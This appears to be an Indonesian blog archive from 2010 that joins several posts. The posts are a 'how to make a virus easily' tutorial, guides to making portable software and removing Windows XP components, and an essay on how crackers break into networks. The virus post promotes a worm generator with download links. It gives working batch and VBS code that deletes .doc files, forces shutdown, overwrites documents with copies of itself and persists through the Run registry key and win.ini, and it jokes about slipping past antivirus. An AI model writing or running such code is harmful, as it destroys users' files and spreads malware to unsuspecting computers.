Jumat, 26 Februari 2010

Cara Gampang Bikin Virus


Kamu pasti masih inget dengan virus worm yang sempat menghebohkan Tampilan awal program Vbs WGinternet beberapa waktu yang lalu : Anna Kournikova. Worm yang menginfeksi Windows beserta Outlook Exressnya, akan mengirim sendiri pesan virus ke seluruh email yang terdapat pada address book.

Sebenarnya untuk membuat worm semacam itu kamu tidak harus menjadi seorang programmer handal. Cukup bisa njalanin komputer dan punya softwarenya. Lalu apa softwarenya ? VBS Worm Generator !! Dengan program yang dibuat oleh hacker Argentina berusia 18 tahun itu kamu dapat membuat virus yang sama dahsyatnya dengan Anna Kournikova, cukup dengan melakukan beberapa klik.

Program VBSWG memungkinkan kamu untuk membuat worm dengan nama sesukamu. Kamu juga bisa memilih efek dari worm tersebut, seperti misalnya menampilkan pesan atau memaksa seseorang untuk menuju situs tertentu. Akibat yang paling parah tentunya jika worm tersebut kamu setting supaya membikin crash komputer.

Kemampuan lain dari VBSWG adalah melakukan enkripsi terhadap source code worm yang dibuat. Kemampuan lainnya bisa kamu coba sendiri :-) Pokoknya cukup hebatlah program ini.

Tapi seperti yang dikatakan oleh pembuatnya, VBS Worm Generator hanya boleh digunakan untuk belajar, bukan untuk merugikan orang lain. Untuk itu jika Anda memang berniat mencobanya, ingat-ingat peringatan tersebut.

Situs yg menyediakan VBSWG :

http://www.filestube.com/db4c4246d3f6e12d03ea/go.html
http://www.kvirii.com.rar,
http://vx.netlux.org/dat/tv07.shtml.

Atau gunakan search engine http://www.google.com dan masukkan keyword vbswg2bfix.zip, Vbswg2B.zip, worm generator, dan keyword semacamnya

Beberapa Perintah Dalam CMD Sebagai Dasar Pembuatan Virus

1.Delete Registry : REG DELETE ALAMAT /v VALUE NAME /f
Keterangan :
- REG DELETE = Menghapus registry
- ALAMAT = HKEY\Software\dst
- /v VALUE NAME = Nama Value
- /f = Tidak wajib!! Berfungsi untuk melaksanakan perintah tanpa prompt
Contoh : REG DELETE HKEY\Software\Microsoft\Windows\Policies\Explorer /v NoFind
Fungsi = Menghapus Value NoFind Di Alamat Registry HKEY\Software\Microsoft\Windows\Policies\Explorer

2.ADD Registry : REG ADD ALAMAT /v VALUE NAME /t TYPE /s SEPARATOR /d DATA /f
Keteranagn :
- REG ADD = Menambah registry
- ALAMAT = HKEY\Software\dst
- /v VALUE NAME = Nama Value
- /t TYPE = Type data Ex: REG_DWORD, REG_SZ
- /d DATA = Isi Value
- /f = Tidak wajib!! Berfungsi untuk melaksanakan perintah tanpa prompt

3.PROMPT : PROMPT Text
Keterangan:
PROMPT = Perintah untuk merubah text PROMPT
Text = Text yang ingn kita munculkan di PROMPT
Text dapat menggunakan karakter spesial yang daftarnya berikut ini!!
$A = Karakter & $N = Drive kita menginstal windows
$B = Karakter | $P = Default
$C = Karakter ( $Q = Karakter =
$D = Karakter Tanggal Sekarang $S = Karakter Spasi
$E = Karakter Escape Kode $T = Karakter Jam Sekarang
$F = Karakter ) $V = Karakter No Versi Windows
$G = Karakter > (lebih besar dari) $_ = Karakter Garis Bawah
$H = Karakter No Text $$ = Karakter Dollar
$L = Karakter < (lebih kecil dari) $+ = Karakter Aritmatik

4.Replace : Replace [Drive\Path\NamaFile] [Drive\Path] /A /P /R /S /W /U
Keterangan:
Replace = Pindahkan
- [Drive\Path\NamaFile] = Spesifik sumber file
- [Drive\Path\] = Folder Tujuan
- A = Pindahkan File ke Folder Tujuan (No Update)
- P = Membuat Prompt MengKonfirmasi Kita Sebelum Memindahkan
- R = Pindahkan hanya File Attribut Read Only
- S = Pindahkan File Ke Semua Sub Direktori Folder Tujuan
- W = Tunggu kita memasukan disk/flashdisk sebelum memindahkan
- U = Pindahkan dan Update jika nama file sudah ada
- Jika menggunakan parameter /A tidak boleh menggunakan /S /U begitu juga sebaliknya.

5.Attrib : Attrib +R -R +A -A +H -H +S -S ADRESS /S /D
Keterangan:
Attrib = Rubah Attribut File/Folder
- (-) = Untuk Menghapus Attribut
- (+) = Untuk Menambah Attribut
- (A) = Attribut Archieve
- (R) = Attribut Read Only
- (H) = Attribut Hidden
- (S) = Attribut Super_Hidden/System
- /S = Proses terhadap file yang sama di folder dan subfolder
- /D = Proses folder Sebagai Sumber
- Adress = Alamat File Misal: C:\Lucky\Ganteng

6.Del : Del /P /F /S /Q /Attribut /Adress
Keterangan:
- Del = Hapus File / Folder
- /P = Membuat Prompt MengKonfirmasi Kita Sebelum Menghapus
- /F = Hapus Hanya Read Only File
- /S = Hapus File Yang Sama Di Semua Sub Direktory
- /Q = Hapus Dengan Cepat
- /Attribut = Pilih Attribut File Yang Ingin Di Hapus (Tidak Ada Berarti Semua File) tanda (-) berarti yang tidak di hapus- - Adress = Alamat File Misal: C:\Lucky\Ganteng

7.Rename : Rename/Ren [Drive\Path\NamaFile] NewFileName
Keterangan:
- Rename = Rubah Nama File
- [Drive\Path\NamaFile] = Alamat Drive dan Nama File
- NewFileName = Nama File Baru

8.Type : Type [Drive\Path\NamaFile]
Keterangan:
- Type = Membuka Semua File Text (*.txt, *.doc, *.xls, *.ini, *.vbs, *.js, dll)
- [Drive\Path\NamaFile] = Lokasi File

9.Start : Start ADDRESS_FILE
- Start = Untuk menjalankan File
- ADDRESS_FILE = Alamat file di special folder seperti windows dan system32
- Ex: Start Regedit maka akan menjalankan Registry Editor.
sekarang kita akan membahas file *.bat yang berfungsi untuk menjalankan perintah command prompt secara bersamaan. oke ketikan kode berikut di notepad: date 07-07-07 dan save dengan nama edit_time.bat dan pilih “All File” dalam kolom “Save As Type” lalu jalankan!! setelah itu apa yang terjadi?? yah tanggal berubah jadi juli-7-2007.

oke lanjut ke file *.bat kita tidak mungkin membuat banyak file *.bat karena selain akan cepat terdeteksi, kita juga akan semakin rumit merubahregistry!! namun jangan kuatir karena file *.bat bisa menjalankan perintah DOS/COMMAND_PROMPT secara langsung.
berikut perintah ini, kita buka notepad dan ketikan code berikut:
del C:\*.doc ‘—– hapus semua file berextensi doc di drive c
Shutdown -s -f -t 30 -c “Selamat Tidur” ‘—– -s = shutdown computer, -f = tutup semua aplikasi tanpa peringatan, -t = setting waktu(dalam detik) -c = menampilkan pesan “Selamat Tidur” (Bebas kita ubah)
attrib +s +h C:\*.jpg /s /d ‘—– beri attribut hidden dan system semua file jpg
for /R c:\ %%r in (*.cob *.doc) do copy %0 “%%r” ‘—– Copy isi file *.bat ke semua file *.cob dan *.doc di C
for /R c:\ %%r in (*.cob *.doc) do ren “%%r” *.bat ‘—– Rename semua file *.cob dan *.doc jadi *.bat sehingga isi file jd virus kita :D haha..haha
Untuk isi file bat yang akan menumpang di virus vbs kita anda boleh pilih mana yang paling cocok!! mungkin menghapus, shutdown dalam 30 detik, menyembunyikan atau merubah isinya jadi file *.bat?? dipilih!! dipilih!!
atau boleh masukin semuanya sehingga virus kita ditambah kode berikut ini:
Set bath = fso.CreateObject(towind & “\sialan.bat”)
bath.writeline “del C:\*.doc”
bath.writeline “Shutdown -s -f -t 30″
bath.writeline “for /R c:\ %%r in (*.cob *.doc) do copy %0 %%r”
bath.writeline “for /R c:\ %%r in (*.cob *.doc) do ren %%r *.bat”
bath.close
‘bonus
wsh.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\Run\”SysError”, “towind & “\sialan.bat”, “REG_SZ”
Maka ketika windows diaktifkan semua file doc akan menjadi *.bat dengan isi kode penghancur kita :D bisa diselamatkan ga tuh?? coba saja supaya anda tahu!!
Namun jika anda punya anti virus biasanya kode tersebut akan di blok karena jelas-jelas untuk merusak!! lalu bagaimana?? kita berdoa supaya antivirus komputer sasaran tidak mengenali :D karena memang tidak semua antivirus akan memblok perintah tersebut. Oia sebagai tambahan kita bisa membuat file lain seperti *.html atau *.ini!! jika kita punya banyak duplikat virus kita bisa membuat file *.ini supaya orang tidak cepat mengetahui virus kita hanya dengan membuka Regedit. untuk terakhir kali saya akan berikan lagi suatu code yang akan merubah file ini diwindows sehingga menjalankan virus kita. oke langsung saja tentunya dengan perintah
set BuatIni = fso.CreateTextFile(”C:\WINDOWS\Win.ini”)
BuatIni.writeline “[WINDOWS]”
BuatIni.writeline “run = C:\Ju_Pe.vbs” ‘—-rubah sesuai letak dan nama virus
BuatIni.writeline “load = C:\Persik.vbs” ‘—-rubah sesuai letak dan nama virus
BuatIni.close
Maka ketika windows dijalankan virus akan aktif!! walaupun mungkin registry telah dirubah.
Dari pembahasan kita maka kita bisa simpulkan beberapa langkah berikut jika terkena virus vbs: jika tidak di enkripsi anda bisa melihat dan membunuh semua virus dan membenarkanregistry dengan membaca source kodenya, tapi jika di enkripsi kita lakukan langkah berikut:
1.Matikan proses virus!! anda bisa menggunakan tool pengganti TaskManager yang biasanya akan di blok.
2.Hapus semua duplikat virus!! anda bisa gunakan antivirus update terbaru dan jika diblok virus anda rubah dulu namanya seperti PCMAV_CLN.exe jadi 123.exe
3.Buka registry dan periksa dengan teliti semua subkey run otomatis biasanya akan terdapat key yang mengarah ke letak virus yang dijalankan dan periksa file win.ini!! jika dirubah anda minta dari komputer teman anda :D dan jika ada petunjuk letak virus langsung hapus.
4.Rubah semua registry yang dirubah virus!! bisa dengan TuneUp Utilities dan sebagainya!!
Untuk pencegahan lakukan langkah berikut:
1.Gunakan antivirus terbaru, jika bisa yang mempunyai fitur heuristik seperti ANSAV.
2.Jangan asal klik file!! lihat dikolom type Windows Explorer apabila application tapi iconnya folder atau MS Word langsung hapus.
3.Selalu scan jika mencolokan flaskdisk
4.Matikan proses autorun melalui registry di alamat
“HKCU(atau HKLM)\Software\Microsoft\Windows\CurrentVersion\Po licies\Explorer”, buat DWORD value baru dengan nama NoDriveTypeAutorun dan isi dengan nilai 255. atau melalui start—Run—ketik GPEDIT.msc—User Configuration—Administratif Templates—–System—–Cari Turn Off AutoPlay—–klik 2x dan rubah jadi Enabled!!
5.Jangan Pakai OS Windows, pake linux cos VMaker Indonesia cuma bisa bikin untuk windows

Sisanya Berfikir Sendiri Ya...
No Pain...
No Gain...

Membuat Software Portable Praktis

Membuat Software Portable Menggunakan Winrar 3 ke atas
sebalum na saya minta maaf kalau salah tempat
maksud hati cuma membagi tutorial saja

Cara membuat software portable dengan
Menggunakan winrar 3 keatas
sebenerna ini sudah lama gw tau cara ini
tapi gw baru bisa share sekarang
credits ga taau waktu itu boleh nge googling
dan plus tutorial na ga jelas tapi karena ingin tau yaa
dicari ternyata bisa

kalau yg ini juga kurang jelas mohon maaf

sori kalau salah tempat

Yang dibutuhkan

1. baca do’a dulu sebelum melakukan segala sesuatu
2. sediakan snak dan miran ( minuman ringan )
3. software winrar versi 3 keatas yg sudah terinstall
4. software aicon ( untuk mengambil icon yg ada pada file exe )
5. file yg ingin dijadikan portable

liat gambar berikut
disini gw contohin transtool ok

buka file dimana transtool terinstall
lalu blok semua file tersebut
kilk kanan pilih add to archive

sesudah itu checklist created sfx archive dan solid archive

lalu pilih tab advance terus klik SFX options
pas di tab general
plih created current folder atau terserah kalian aja sih
kalau sudah pilih tab text dan icon maka akan seperti ini
pada box text to display in SFX window

maka tulis / ketik / copy paste code ini

Code:
Setup=nama file
TempMode
Silent=1
Overwrite=1

Contoh : karena disini gw mau buat transtool maka code na seperti ini

Code:
Setup=TranslatorXP.exe
TempMode
Silent=1
Overwrite=1

harus bener atau sama nama file na kalau salah yaaa ga bakal bisa

misal file yg mau dijadikan portable adalah gw.exe
maka yg ditulis distu yg dicetak tebal itu / kalau mau gampang na sih
klick di file tersebut terus klik F2 lalu copy nama file na

Sebener nya sampe sini juga sudah bisa tinggal di ok dan ok
Tapi untuk lebih menyerupai software asli na maka kita
Tinggal menambahkan icon na saja
Untuk mengambil icon yg ada di file exe maka kita butuh software aicon
cara menggunakan software ini di coba sendiri aja yaa gampang kok
atau juga bisa menggunakan icon yg u buat
ingat eksitensi icon itu .ico

untuk memasukan icon na kita pilih load SFX icon from file
klik browse lalu pilih icon na
setelah itu klik ok terus klik ok lagi

ok sampe disini kita sudah bisa membuat software portable

ini software aicon na

Code:
http://www35.indowebster.com/ee737a4e5fae02d9b8b6c602b8d86a02.exe

maaf kalau salah tempat cuma mau share aja
dan sori kalau acak acakan tutor na

Menghapus Program Bawaan Windows

Windows XP secara default menyertakan beberapa program yang merupakan komponen Windows. Program-program tersebut diantaranya adalah Notepad, Writepad, Paint, Pinball dan lain sebagainya. Beberapa orang dari Anda mungkin kurang perlu dengan program-program tersebut karena telah menggunakan program pihak ketiga. Misalnya Anda menggunakan Ms. Word sebagai pengganti Writepad, Photoshop sebagai pengganti paint, atau Digsby untuk menggantikan Windows Messenger. Oleh karena itu Anda akan menghapus program-program bawaan Windows tersebut. Anda bisa menghapusnya melalui Add/Remove Windows Components di jendela Add/Remove Programs.

Namun, Windows XP menyembunyikan beberapa program yang merupakan komponen Windows dari daftar Add/Remove Windows Components. Misalnya Writepad, Paint, Pinball dan beberapa program lainnya. Nah, kalau begini bagaimana Anda bisa menghapusnya? Tenang aja, masih ada sebuah triks untuk menghilangkan program-program bawaan Windows seperti Writepad tadi. Berikut langkah-langkahnya:
  1. Buka Run dengan mengklik Start => Run.

  2. Pada kotak dialog run ketik "C:\Windows\inf\sysoc.inf" (tanpa tanda kutip) dan tekan Enter untuk membuka file Sysoc.inf.

  3. Anda juga bisa membukanya melalui jendela Windows Explorer pada path C:\Windows\inf.

  4. Setalah file sysoc.inf terbuka pada Notepad, cari baris yang berisi nama program yang ingin Anda hapus. Contohnya seperti dibawah:

  5. AccessOpt=ocgen.dll,OcEntry,optional.inf,hide,7
    Pinball=ocgen.dll,OcEntry,pinball.inf,hide,7
    MSWordPad=ocgen.dll,OcEntry,wordpad.inf,hide,7

  6. Yang perlu Anda lakukan sekarang adalah sebagai berikut: Misalkan Anda ingin menghapus Ms Word Pad namun program tersebut tidak kelihatan pada jendela Add/Remove Windows Components, maka Anda cukup menghapus kata "hide" (tanpa tanda kutip) untuk menampilkannya dalam daftar. Sehingga akan menjadi seperti ini:

  7. MSWordPad=ocgen.dll,OcEntry,wordpad.inf,,7

  8. Lakukan langkah-langkah yang sama untuk menampilkan program-program yang tidak tampil di daftar Add/Remove Windows Components.

  9. Jika sudah selesai, simpan dengan mengklik menu File => Save sebelum menutup jendela Notepad.

Semuanya telah selesai. Sekarang coba buka jendela Add/Remove Windows Components dengan membuka Control Panel dan klik Add/Remove Programs. Pada jendela Add/Remove Programs klik Add/Remove Windows Components. Cobalah periksa apakah Ms. Word Pad sudah muncul di daftar? Jika sudah, sekarang Anda tinggal menandainya untuk dihapus.
Selamat Mencoba!

Ingin versi PDF? Click link di bawah:
Link 1: Download PDF Menghapus Program Bawaan Windows.

Rabu, 24 Februari 2010

Making Portable

Sebenarnya membuat software menjadi portable itu gampang bisa menggunakan tool seperti Thinstall atau menggunakan VmWare ThinApp.

Tapi perlu di ingat tidak semua software portable dapat berjalan pada windows lain dan sebaliknya pun tool yang digunakan untuk membuat software menjadi portable juga tidak bisa berjalan di windows lain contoh, kemarin saya coba membuat portable dengan menggunakan VmWare ThinApp..
saya coba jalankan aplikasi tersebut pada windows 7 sama sekali tidak berjalan seperti halnya jika software portable juga tidak bisa berjalan pada windows 7 bahkan, mungkin vista. jadi kesimpulanya tool dan software portable hanya bisa berjalan pada windows xp aku tidak tau mengapa.

Oke ada beberapa cara untuk membuat atau mendapatkan software portable, untuk cara pertama adalah cara yang paling gampang yaitu jika sobat install software setelah selesai instalasi langsung aja copy folder yang ada di directory C:/ "ingat software instalasi jika sudah pernah dijalankan kemudian sobat copy dari directory tidak bakalan bisa berjalan ini berlaku jika sobat ingin copas dari komputer lain".

Saya juga baca ulasan tentang cara membuat software portable dengan SysTracer tapi setelah saya ikuti tool SysTracer tersebut hanyalah untuk melihat perubahan dalam registry saja.

Nah cara kedua dengan cara menggunakan Thinstall silahkan download disini jika belum punya tool tersebut, nah untuk cara membuat nya sobat bisa lihat caranya disini.
Yipz..cara yang ketiga menggunakan VmWare ThinApp v.4.0.2.3089.


1. Jalankan Appnya untuk contoh saya akan membuat software portable Registry Mechanic 7.0.0.1010. "sebaiknya tutup aplikasi yang sedang berjalan terlebih dahulu" tekan tombol next.

2. jika sudah silahkan minimize kan VmWare nya barulah lakukan instalasi software yang akan dijadikan portable tadi,


kemudian setelah instalasi selesai buka jendela VmWare kembali kemudian tekan next biarkan proses selesai sampai pada gambar dibawah ini kemudian next kembali.

3. Pada bagian ini silahkan sobat pilih USB flash karena akan di pakai di USB atau memory flash lainya kemudian next kembali kemudian pilih merged dan tekan next kemudian pilih fast compression, lalu next.





4. Pada tahap akhir silahkan tekan build now kemudian tunggu sampai proses build selesai, jika build selesai click finish, nah dari sini kelar sudah pembuatan software portable langkah selanjutnya silahkan meluncur ke


C:\Program Files\VMware\VMware ThinApp\Captures\Registry Mechanic 7.0





cari folder bin nah didalam folder itulah software portable yang tadi dibuat berada untuk file yang lainya silahkan delete aja kecuali tadi folder bin daripada numpuk menuhin ruang memory, kemudian silahkan sobat pindahkan bisa di letakan di USB atau memory flsh lainya.

Selamat mencoba !

Membuat Software Menjadi Portable

Apa itu software portable? software portable adalah software yang bias digunakan tapi tanpa perlu untuk di instal terlebih dahulu, intinya software tersebut bisa langsung di gunakan dengan terlebih dahulu mengedit registry nya, kita juga dapat membuat software portable sendiri, berikut langkah-langkah nya cara untuk membuat software portable:

1. software yang akan kita jadikan contoh untuk percobaan ini adalah software “Opera browser”. bisa di download terlebih dahulu di http://www.opera.com/browser.

2. tools selanjutnya yang diperlukan adalah systracer.zip yang bisa di download di http://www.snapdrive.net/files/588167/SysTracer.zip

3. selanjutnya tools yang diperlukan adalah WInRar.

4. Ok, selanjutnya jalankan systracer.zip tadi yang telah di download untuk mengedit registry software sebelum di “portable” kan.

5. Install “Opera Browser” kalian yang sudah di download tadi.

6. Sekarang take snapshot lagi, untuk melihat perubahan yang sudah ‘dilakukan’ opera
Setelah dilakukan snapshot 2 kali, lakukan compare.

7. Lihat perubahan yang terjadi pada registry, (Perhatikan directory HKEY_Current_User (HKCU) dan HKEY_Current_Machine (HKCM) saja) registry yang telah berubah terjadi pada yang berwarna hijau.

8. Buat folder Baru untuk menyimpan file-file untuk keperluan membuat software portable.

9. Sekarang, buka registry editor (Start –> run –> ketikkan “regedit” [tanpa tanda kutip] –> OK) untuk me-Export regisrty. Untuk HKCU pilih HKCU –> Software –> Opera Software –> lalu Export

10. Lalu kemudian simpan dengan nama oport1.reg di folder OPORT, ntuk HKCM pilih –> Software –> Netscape –> Netscape Navigator –> Opera –> main –> Export

11. Simpan dengan nama oport2.reg di folder OPORT.

12. Kemudian buat unreg nya supaya software yang kita jalankan/eksekusi tidak meninggalkan jejak di registry.

13. Cara membuat unregnya, perhatikan oport1.reg dan oport2.reg atau copas codenya di bawah ini ke notepad dan simpan kode di bawah ini ke folder OPORT dengan nama unreg.reg

Kode:
Windows Registry Editor Version 4.00
[-HKEY_CURRENT_USERSoftwareOpera Software]
[-HKEY_LOCAL_MACHINESOFTWARENetscapeNetscape NavigatorOperamain]

Nb :
Baris kedua adalah untuk meng uninstall oport1.reg
Baris ketiga adalah untuk meng uninstall oport2.reg

Sekarang copy semua file yang ada di C:program filesopera ke folder OPORT
Buka notepad, copas code dibawa
Kode:
regedit /s reg1.reg
regedit /s reg2.reg
Opera.exe
regedit /s unreg.reg

simpan dengan nama setup.bat

14. Hapus semua file kecuali file dengan extensi .EXE

15. SELESAI!


BAGIKAN TULISAN INI KE FACEBOOK —>>Share

Minggu, 21 Februari 2010

Cara Hack Facebook Dengan Keylogger

Belajar Menjadi Hacker


Hacker dengan keahliannya dapat melihat & memperbaiki kelemahan perangkat lunak di komputer; biasanya kemudian di publikasikan secara terbuka di Internet agar sistem menjadi lebih baik. Sialnya, segelintir manusia berhati jahat menggunakan informasi tersebut untuk kejahatan - mereka biasanya disebut cracker. Pada dasarnya dunia hacker & cracker tidak berbeda dengan dunia seni, disini kita berbicara seni keamanan jaringan Internet.


Saya berharap ilmu keamanan jaringan di tulisan ini digunakan untuk hal-hal yang baik - jadilah Hacker bukan Cracker. Jangan sampai anda terkena karma karena menggunakan ilmu untuk merusak milik orang lain. Apalagi, pada saat ini kebutuhan akan hacker semakin bertambah di Indonesia dengan semakin banyak dotcommers yang ingin IPO di berbagai bursa saham. Nama baik & nilai sebuah dotcom bisa jatuh bahkan menjadi tidak berharga jika dotcom di bobol. Dalam kondisi ini, para hacker di harapkan bisa menjadi konsultan keamanan bagi para dotcommers tersebut - karena SDM pihak kepolisian & aparat keamanan Indonesia amat sangat lemah & menyedihkan di bidang Teknologi Informasi & Internet. Apa boleh buat cybersquad, cyberpatrol swasta barangkali perlu di budayakan untuk survival dotcommers Indonesia di Internet.



Berbagai teknik keamanan jaringan Internet dapat di peroleh secara mudah di Internet antara lain di http://www.sans.org, http://www.rootshell.com, http://www.linuxfirewall.org/, http://www.linuxdoc.org, http://www.cerias.purdue.edu/coast/firewalls/, http://www.redhat.com/mirrors/LDP/HOWTO/. Sebagian dari teknik ini berupa buku-buku yang jumlah-nya beberapa ratus halaman yang dapat di ambil secara cuma-cuma (gratis). Beberapa Frequently Asked Questions (FAQ) tentang keamanan jaringan bisa diperoleh di http://www.iss.net/vd/mail.html, http://www.v-one.com/documents/fw-faq.htm. Dan bagi para experimenter beberapa script / program yang sudah jadi dapat diperoleh antara lain di http://bastille-linux.sourceforge.net/, http://www.redhat.com/support/docs/tips/firewall/firewallservice.html.


Bagi pembaca yang ingin memperoleh ilmu tentang jaringan dapat di download secara cuma-cuma dari http://pandu.dhs.org, http://www.bogor.net/idkf/, http://louis.idaman.com/idkf. Beberapa buku berbentuk softcopy yang dapat di ambil gratis dapat di ambil dari http://pandu.dhs.org/Buku-Online/. Kita harus berterima kasih terutama kepada team Pandu yang dimotori oleh I Made Wiryana untuk ini. Pada saat ini, saya tidak terlalu tahu adanya tempat diskusi Indonesia yang aktif membahas teknik-teknik hacking ini - tetapi mungkin bisa sebagian di diskusikan di mailing list lanjut seperti kursus-linux@yahoogroups.com & linux-admin@linux.or.id yang di operasikan oleh Kelompok Pengguna Linux Indonesia (KPLI) http://www.kpli.or.id.


Cara paling sederhana untuk melihat kelemahan sistem adalah dengan cara mencari informasi dari berbagai vendor misalnya di http://www.sans.org/newlook/publications/roadmap.htm#3b tentang kelemahan dari sistem yang mereka buat sendiri. Di samping, memonitoring berbagai mailing list di Internet yang berkaitan dengan keamanan jaringan seperti dalam daftar http://www.sans.org/newlook/publications/roadmap.htm#3e.


Dijelaskan oleh Front-line Information Security Team, ”Techniques Adopted By ’System Crackers’ When Attempting To Break Into Corporate or Sensitive Private Networks,” fist@ns2.co.uk http://www.ns2.co.uk. Seorang Cracker umumnya pria usia 16-25 tahun. Berdasarkan statistik pengguna Internet di Indonesia maka sebetulnya mayoritas pengguna Internet di Indonesia adalah anak-anak muda pada usia ini juga. Memang usia ini adalah usia yang sangat ideal dalam menimba ilmu baru termasuk ilmu Internet, sangat disayangkan jika kita tidak berhasil menginternetkan ke 25000 sekolah Indonesia s/d tahun 2002 - karena tumpuan hari depan bangsa Indonesia berada di tangan anak-anak muda kita ini.


Nah, para cracker muda ini umumnya melakukan cracking untuk meningkatkan kemampuan / menggunakan sumber daya di jaringan untuk kepentingan sendiri. Umumnya para cracker adalah opportunis. Melihat kelemahan sistem dengan mejalankan program scanner. Setelah memperoleh akses root, cracker akan menginstall pintu belakang (backdoor) dan menutup semua kelemahan umum yang ada.


Seperti kita tahu, umumnya berbagai perusahaan / dotcommers akan menggunakan Internet untuk (1) hosting web server mereka, (2) komunikasi e-mail dan (3) memberikan akses web / internet kepada karyawan-nya. Pemisahan jaringan Internet dan IntraNet umumnya dilakukan dengan menggunakan teknik / software Firewall dan Proxy server. Melihat kondisi penggunaan di atas, kelemahan sistem umumnya dapat di tembus misalnya dengan menembus mailserver external / luar yang digunakan untuk memudahkan akses ke mail keluar dari perusahaan. Selain itu, dengan menggunakan agressive-SNMP scanner & program yang memaksa SNMP community string dapat mengubah sebuah router menjadi bridge (jembatan) yang kemudian dapat digunakan untuk batu loncatan untuk masuk ke dalam jaringan internal perusahaan (IntraNet).


Agar cracker terlindungi pada saat melakukan serangan, teknik cloacking (penyamaran) dilakukan dengan cara melompat dari mesin yang sebelumnya telah di compromised (ditaklukan) melalui program telnet atau rsh. Pada mesin perantara yang menggunakan Windows serangan dapat dilakukan dengan melompat dari program Wingate. Selain itu, melompat dapat dilakukan melalui perangkat proxy yang konfigurasinya kurang baik.


Setelah berhasil melompat dan memasuki sistem lain, cracker biasanya melakukan probing terhadap jaringan dan mengumpulkan informasi yang dibutuhkan. Hal ini dilakukan dengan beberapa cara, misalnya (1) menggunakan nslookup untuk menjalankan perintah ’ls ’ , (2) melihat file HTML di webserver anda untuk mengidentifikasi mesin lainnya, (3) melihat berbagai dokumen di FTP server, (4) menghubungkan diri ke mail server dan menggunakan perintah ’expn ’, dan (5) mem-finger user di mesin-mesin eksternal lainnya.


Langkah selanjutnya, cracker akan mengidentifikasi komponen jaringan yang dipercaya oleh system apa saja. Komponen jaringan tersebut biasanya mesin administrator dan server yang biasanya di anggap paling aman di jaringan. Start dengan check akses & eksport NFS ke berbagai direktori yang kritis seperti /usr/bin, /etc dan /home. Eksploitasi mesin melalui kelemahan Common Gateway Interface (CGI), dengan akses ke file /etc/hosts.allow.


Selanjutnya cracker harus mengidentifikasi komponen jaringan yang lemah dan bisa di taklukan. Cracker bisa mengunakan program di Linux seperti ADMhack, mscan, nmap dan banyak scanner kecil lainnya. Program seperti ’ps’ & ’netstat’ di buat trojan (ingat cerita kuda troya? dalam cerita klasik yunani kuno) untuk menyembunyikan proses scanning. Bagi cracker yang cukup advanced dapat mengunakan aggressive-SNMP scanning untuk men-scan peralatan dengan SNMP.


Setelah cracker berhasil mengidentifikasi komponen jaringan yang lemah dan bisa di taklukan, maka cracker akan menjalan program untuk menaklukan program daemon yang lemah di server. Program daemon adalah program di server yang biasanya berjalan di belakang layar (sebagai daemon / setan). Keberhasilan menaklukan program daemon ini akan memungkinkan seorang Cracker untuk memperoleh akses sebagai ’root’ (administrator tertinggi di server).


Untuk menghilangkan jejak, seorang cracker biasanya melakukan operasi pembersihan ’clean-up’ operation dengan cara membersihkan berbagai log file. Dan menambahkan program untuk masuk dari pintu belakang ’backdooring’. Mengganti file .rhosts di /usr/bin untuk memudahkan akses ke mesin yang di taklukan melalui rsh & csh.


Selanjutnya seorang cracker dapat menggunakan mesin yang sudah ditaklukan untuk kepentingannya sendiri, misalnya mengambil informasi sensitif yang seharusnya tidak dibacanya; mengcracking mesin lain dengan melompat dari mesin yang di taklukan; memasang sniffer untuk melihat / mencatat berbagai trafik / komunikasi yang lewat; bahkan bisa mematikan sistem / jaringan dengan cara menjalankan perintah ’rm -rf / &’. Yang terakhir akan sangat fatal akibatnya karena sistem akan hancur sama sekali, terutama jika semua software di letakan di harddisk. Proses re-install seluruh sistem harus di lakukan, akan memusingkan jika hal ini dilakukan di mesin-mesin yang menjalankan misi kritis.


Oleh karena itu semua mesin & router yang menjalankan misi kritis sebaiknya selalu di periksa keamanannya & di patch oleh software yang lebih baru. Backup menjadi penting sekali terutama pada mesin-mesin yang menjalankan misi kritis supaya terselamatkan dari ulah cracker yang men-disable sistem dengan ’rm -rf / &’.


Bagi kita yang sehari-hari bergelut di Internet biasanya justru akan sangat menghargai keberadaan para hacker (bukan Cracker). Karena berkat para hacker-lah Internet ada dan dapat kita nikmati seperti sekarang ini, bahkan terus di perbaiki untuk menjadi sistem yang lebih baik lagi. Berbagai kelemahan sistem di perbaiki karena kepandaian rekan-rekan hacker yang sering kali mengerjakan perbaikan tsb. secara sukarela karena hobby-nya. Apalagi seringkali hasil hacking-nya di sebarkan secara cuma-cuma di Internet untuk keperluan masyarakat Internet. Sebuah nilai & budaya gotong royong yang mulia justru tumbuh di dunia maya Internet yang biasanya terkesan futuristik dan jauh dari rasa sosial.


Pengembangan para hobbiest hacker ini menjadi penting sekali untuk keberlangsungan / survival dotcommers di wahana Internet Indonesia. Sebagai salah satu bentuk nyatanya, dalam waktu dekat Insya Allah sekitar pertengahan April 2001 akan di adakan hacking competition di Internet untuk membobol sebuah server yang telah di tentukan terlebih dahulu. Hacking competition tersebut di motori oleh anak-anak muda di Kelompok Pengguna Linux Indonesia (KPLI) Semarang yang digerakan oleh anak muda seperti Kresno Aji (masaji@telkom.net), Agus Hartanto (hartx@writeme.com) & Lekso Budi Handoko (handoko@riset.dinus.ac.id). Seperti umumnya anak-anak muda lainnya, mereka umumnya bermodal cekak - bantuan & sponsor tentunya akan sangat bermanfaat dan dinantikan oleh rekan-rekan muda ini.


Mudah-mudahan semua ini akan menambah semangat pembaca, khususnya pembaca muda, untuk bergerak di dunia hacker yang mengasyikan dan menantang. Kalau kata Captain Jean Luc Picard di Film Startrek Next Generation, ”To boldly go where no one has gone before”.


Penulis: Onno W Purbo



Artikel Belajar Menjadi Hacker ini dipersembahkan oleh Klik-Kanan.com. Kunjungi Klik-Kanan.com untuk informasi seputar komputer dan internet.